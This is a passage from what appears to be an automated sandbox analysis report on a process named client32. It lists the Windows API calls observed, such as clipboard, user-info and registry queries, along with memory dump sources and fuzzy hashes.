                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3768737497-0
                                                                                                                • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                                                • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                                • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                                                APIs
                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LockitLockit::_std::_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3382485803-0
                                                                                                                • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                                                • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                                • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                                                APIs
                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75A38400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3660427363-0
                                                                                                                • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                                • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                                • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                                APIs
                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: InformationToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 4114910276-0
                                                                                                                • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                                • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                                                • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                                • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 328603210-0
                                                                                                                • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                                                • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __waccess_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 4272103461-0
                                                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __fsopen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3646066109-0
                                                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                                                                APIs
                                                                                                                • _NSMClient32@8.PCICL32(?,?,?,006510A8,00000000), ref: 0065100B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3698267949.0000000000651000.00000020.00000001.01000000.00000007.sdmp, Offset: 00650000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3697347028.0000000000650000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_650000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Client32@8
                                                                                                                • String ID:
                                                                                                                • API String ID: 433899448-0
                                                                                                                • Opcode ID: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
                                                                                                                • Instruction ID: 8d0f32eeee48cd57b263f04485e8d223c2704d65efe0a1307b47eedf3e766425
                                                                                                                • Opcode Fuzzy Hash: bcf7271d315083a8dc9b5948f88720d35dfe72292b861e80aa23c6e2ae061862
                                                                                                                • Instruction Fuzzy Hash: E3B092B611034D9B8714EE98E941D7B339DAA48610F00090DBD01473829A61FC60D676
                                                                                                                APIs
                                                                                                                  • Part of subcall function 6CEF09A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CEF1E32,00000001,?,00000000,00000000,00000000,?,6CF175BC,00000001,00000214), ref: 6CEF09E8
                                                                                                                • Sleep.KERNEL32(00000000), ref: 6CF1F1D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710952050.000000006CEE1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CEE0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710934142.000000006CEE0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711022108.000000006CF94000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711041416.000000006CF96000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3711061539.000000006CF99000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_6cee0000_client32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeapSleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 4201116106-0
                                                                                                                • Opcode ID: a9c33f01c8c41a899d63087910814a5e1a07d7d8ebaae1a6aa61e6a847308c5e
                                                                                                                • Instruction ID: 52c375a2762af263cad85552ad0630220c8acd2e627c96cd05a4dad96ea44a37
                                                                                                                • Opcode Fuzzy Hash: a9c33f01c8c41a899d63087910814a5e1a07d7d8ebaae1a6aa61e6a847308c5e
                                                                                                                • Instruction Fuzzy Hash: 72F0A735A401185BCB604AA5D80078A3FBAABC3378F310322F938C2AC0D631C9478692
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                                                • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                                                • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                                                • GetTickCount.KERNEL32 ref: 111472A0
                                                                                                                • GetTickCount.KERNEL32 ref: 111472C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                • API String ID: 132346978-2450594007
                                                                                                                • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                                                • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                                                APIs
                                                                                                                • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                                                                • GetClipboardData.USER32(?), ref: 1103337D
                                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                                                                • GetLastError.KERNEL32 ref: 11033406
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                                                                • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                                                                • API String ID: 1861668072-1296821031
                                                                                                                • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                                                                • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                                                                • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                                                                • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountIconicTick
                                                                                                                • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                                                                • API String ID: 1307367305-2838568823
                                                                                                                • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                                                                • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                                                                • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                                                                APIs
                                                                                                                • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                                                                • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                                                                • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
